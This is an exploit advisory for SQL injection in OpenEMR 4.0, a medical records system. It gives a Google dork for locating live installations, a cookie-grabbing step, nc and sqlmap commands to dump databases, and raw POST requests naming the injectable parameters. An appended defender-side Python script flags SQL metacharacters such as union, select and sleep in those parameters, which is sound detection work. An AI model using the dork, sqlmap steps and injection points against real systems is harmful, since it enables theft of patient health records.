# Exploit Title: Open EMR
# Google Dork: inurl:"/interface/login/login_frame.php" intitle:"Login" intext:"Username:"
# Date: 3/08/2011
# Author: Mehdi Boukazoula ; Houssam Sahli
# Software Link with patch: http://www.oemr.org/wiki/OpenEMR_Downloads
# Version: v4.0 fully patched
# Tested on: v4.0
#
# Description: an authenticated user can exploit this vulnerability by reading the session cookie from the browser with the URL javascript:alert(document.cookie), putting it into a request file together with the SQL command, and sending the request:
#
#   root@# cat request.txt | nc -vv yourhost 80
#
# or simply using sqlmap like this:
#
#   root@# sqlmap -r request.txt -p "YOUR PARAMETER" --dbs

--------------------------------------------------------------------------------------------------------

--- Request 1
Affected parameters: provider_id, pc_category

POST http://127.0.0.1/openemr/interface/main/calendar/index.php?module=PostCalendar&func=search HTTP/1.1
Accept-language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-encoding: identity
Keep-alive: 115
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-agent: Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10
Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Host: 127.0.0.1
Referer: http://127.0.0.1/openemr/interface/main/calendar/index.php?module=PostCalendar&func=search
Cookie: PUT-THE-COOKIE-HERE
Content-type: application/x-www-form-urlencoded
Proxy-connection: keep-alive

pc_keywords=bob&provider_id=_ALL_&end=08/10/2011&pc_category=&submit=Submit&start=08/03/2011&pc_keywords_andor=AND&pc_facility=

--------------------------------------------------------------

--- Request 2
Affected parameters: form_patient_id

POST http://127.0.0.1/openemr/interface/reports/chart_location_activity.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10 Paros/3.2.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://127.0.0.1/openemr/interface/reports/chart_location_activity.php
Cookie: PUT-THE-COOKIE-HERE
Content-Type: application/x-www-form-urlencoded
Content-Length: 38

form_refresh=true&form_patient_id=patient

---------------------------------------------------------------
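Added example (not part of the advisory, and not OpenEMR code): a defender-side triage script that parses a raw request in the request.txt shape shown above and flags values of the two affected endpoints' parameters that carry SQL metacharacters, so the same request templates can be used to check a WAF rule or an access-log review. The endpoint/parameter table comes from the advisory; the metacharacter pattern and the sample request with an appended quote are assumptions constructed here.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Affected endpoints and parameters as listed in the advisory.
AFFECTED = {
    "/openemr/interface/main/calendar/index.php": {"provider_id", "pc_category"},
    "/openemr/interface/reports/chart_location_activity.php": {"form_patient_id"},
}

# Tokens that never belong in these identifier-style values (assumed pattern, not from the advisory).
SQL_META = re.compile(r"['\";]|--|/\*|\b(union|select|sleep|benchmark)\b", re.I)


def parse_raw_request(raw):
    """Split a request.txt-style raw request into method, path, headers and form body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, target, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": urlsplit(target).path, "headers": headers,
            "body": parse_qs(body.strip(), keep_blank_values=True)}


def flag_injection_attempts(raw):
    """Return (parameter, value) pairs where an affected parameter carries SQL metacharacters."""
    req = parse_raw_request(raw)
    hits = []
    for name in AFFECTED.get(req["path"], ()):
        for value in req["body"].get(name, []):
            if SQL_META.search(value):
                hits.append((name, value))
    return hits


# Constructed sample: Request 2 from the advisory with a single quote appended to the
# affected parameter, the kind of probe a WAF rule or access-log review should surface.
SAMPLE_REQUEST = (
    "POST http://127.0.0.1/openemr/interface/reports/chart_location_activity.php HTTP/1.1\n"
    "Host: 127.0.0.1\n"
    "Cookie: PUT-THE-COOKIE-HERE\n"
    "Content-Type: application/x-www-form-urlencoded\n"
    "\n"
    "form_refresh=true&form_patient_id=patient'"
)

if __name__ == "__main__":
    print(flag_injection_attempts(SAMPLE_REQUEST))
```

Only the parameters the advisory names are inspected, so a metacharacter in an unlisted field such as pc_keywords is deliberately not reported by this rule.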